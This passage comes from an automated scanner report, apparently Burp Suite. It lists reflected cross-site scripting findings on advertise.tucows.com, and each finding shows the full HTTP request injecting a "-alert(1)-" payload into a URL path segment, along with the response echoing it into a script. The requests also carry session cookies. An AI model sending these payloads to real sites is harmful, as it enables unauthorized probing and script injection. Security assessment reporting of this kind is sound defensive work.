Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes1fa22"-alert(1)-"0e7110e52dc/js/xdocsize.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:17 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes1fa22"-alert(1)-"0e7110e52dc/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.26. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c95d"-alert(1)-"1272630c525 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js9c95d"-alert(1)-"1272630c525/xdocsize.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:23 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js9c95d"-alert(1)-"1272630c525/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.27. http://advertise.tucows.com/includes/js/xdocsize.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9f090"-alert(1)-"a04c13647f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/xdocsize.js9f090"-alert(1)-"a04c13647f HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:36 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32156

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/xdocsize.js9f090"-alert(1)-"a04c13647f";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.28. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8a6f"-alert(1)-"48e3c448543 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includesb8a6f"-alert(1)-"48e3c448543/js/yetii.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:20 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includesb8a6f"-alert(1)-"48e3c448543/js/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.29. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 505a4"-alert(1)-"da5a49629e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js505a4"-alert(1)-"da5a49629e/yetii.js HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:26 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js505a4"-alert(1)-"da5a49629e/yetii.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.30. http://advertise.tucows.com/includes/js/yetii.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/js/yetii.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5ad87"-alert(1)-"ee3d1dab97f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/js/yetii.js5ad87"-alert(1)-"ee3d1dab97f HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:38 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/js/yetii.js5ad87"-alert(1)-"ee3d1dab97f";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.31. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f637"-alert(1)-"80f9081ac8c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes5f637"-alert(1)-"80f9081ac8c/themes/03BlueMeany/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:29 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes5f637"-alert(1)-"80f9081ac8c/themes/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.32. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49de9"-alert(1)-"04a15e87fd3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes49de9"-alert(1)-"04a15e87fd3/03BlueMeany/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:45 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 31930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes49de9"-alert(1)-"04a15e87fd3/03BlueMeany/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.33. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3a9a"-alert(1)-"237aaaa614c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeanyc3a9a"-alert(1)-"237aaaa614c/style.css HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D

Response

HTTP/1.0 404 Not Found
Date: Fri, 04 Feb 2011 17:56:55 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 32397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://advertise.tucows.com/includes/themes/03BlueMeanyc3a9a"-alert(1)-"237aaaa614c/style.css";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.34. http://advertise.tucows.com/includes/themes/03BlueMeany/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertise.tucows.com
Path:   /includes/themes/03BlueMeany/style.css

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9f64"-alert(1)-"4bb4721a55e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /includes/themes/03BlueMeany/style.cssa9f64"-alert(1)-"4bb4721a55e HTTP/1.1
Host: advertise.tucows.com
Proxy-Connection: keep-alive
Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
